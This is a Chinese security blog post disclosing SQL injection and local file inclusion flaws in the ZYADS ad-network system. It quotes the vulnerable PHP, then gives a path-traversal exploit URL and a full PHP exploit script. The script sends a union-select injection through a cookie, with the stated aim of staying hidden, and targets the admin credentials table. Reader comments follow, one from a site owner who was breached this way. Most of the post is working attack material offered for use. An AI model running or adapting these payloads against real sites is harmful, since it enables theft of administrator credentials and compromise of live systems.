中易广告联盟系统(ZYADS) sql注入和本地包含漏洞

作者:q1ur3n

在index/news.php 1-31行

<?
include_once("top.php");

      $newsid = intval($_GET['id']);

      $to_type = addslashes($_GET['type']);

      if ($to_type=='index')
      {
          $to_type_s =" and to_type=1";
      }

       if ($to_type=='webuser')
      {
          $to_type_s =" and to_type!=3";
      }

       if ($to_type=='webadver')
      {
          $to_type_s =" and to_type!=2";
      }

      $newssql = 'select * from zyads_news WHERE `id` =\'' . $newsid . '\' 

'.$to_type_s.'';

      $newsre=$db->query($newssql);
      $newsrow = $db->fetch_array($newsre);
      if (empty($newsrow)){

        zyads_message('zyads_news');
      }
?>

可以看到$to_type没定义或者不等于index,webuser,webadver的话 那么$to_type_s是没有定义的

这时候我们就可以提交一个$to_type_s变量来进行sql注入。简单的注入,呵呵。

在/code/adview_cpa_html.php 1-46行

<?php
/*********************/
/*                   */
/*  Version : 5.1.0  */
/*  Author  : RM     */
/*  Comment : 071223 */
/*                   */
/*********************/

_obfuscate_JQYdYn1jfBI( );
define( "IN_ZYADS", TRUE );
$name = $_GET['name'];
$adid = $_GET['adid'];
$offsetwidth = $_GET['offsetwidth'];
$site = $_GET['site'];
$click_url = "http://www.erzhi.cn";
$count_url = "http://www.erzhi.cn";
if ( empty( $name ) || empty( $adid ) || empty( $site ) )
{
        exit( "广告出错" );
}
@require( "../user/c/".$name."/user_info.php" );
require( "../include/soft_class.php" );
require( "../include/settings.php" );
$code = new _obfuscate_Y2xpZW50( );
$getip = $code->_obfuscate_Z2V0aXA( );
$getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( );
$getos = $code->_obfuscate_Z2V0b3M( );
$maketime = time( ) + $setting['zyads_date'] * 3600;
$maketime = $maketime;
$strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA( 

$getip."|".$maketime."|".$getbrowse."|".$getos, $setting['url_pwd'] );
$strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas );
if ( $zyads_users['flag'] != 2 )
{
        echo "document.write('帐号被锁定');";
        exit( );
}
if ( _obfuscate_Cx96BhhwZxABPA8( "../cache/cpa/".$adid.".php" ) )
{
        require( "../cache/cpa/".$adid.".php" );
}
else
{
        exit( "文件丢失-".$adid.".php" );
}

$name,$adid这两个变量都能造成本地包含漏洞

不过$adid好利用点。

exp:/code/adview_cpa_html.php?name=admin&adid=../../index&site=www.xxx.com

最后附上一个exp,只是简单的cookie提交参数  为了隐蔽点 呵呵

<?php
//by q1ur3n
//team: http://www.wolvez.org
//exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23
//敏感信息表信息:
/*
DROP TABLE IF EXISTS zyads_admin;
CREATE TABLE zyads_admin (
   id int(11) NOT NULL auto_increment,
   username varchar(20) NOT NULL,
   pwd varchar(50) NOT NULL,
   login_num int(11) NOT NULL,
   last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
   islock int(1) NOT NULL,
   ip varchar(20) NOT NULL,
   admin_flag varchar(200) NOT NULL,
   addtime datetime NOT NULL,
   PRIMARY KEY (id)
);

*/

$host = $_GET['site'];
$cmd='to_type_s='.urlencode(stripcslashes($_REQUEST["id"]));

$message = "GET /index/news.php?id=89  HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-

shockwave-flash, */*\r\n";
$message .= "Referer: http://www.baidu.com/\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cmd."\r\n\r\n";
//echo $message;

$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
fclose($fp);

?>

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • 小赚

    嘿嘿··这个联盟以前用过,被人搞了,一直不明白怎么被人日的,今天算是明白了。

  • 假的

    这个都是什么年代的版本了。
    2.0的好像
    几年前的版本了。没有什么意思

发表评论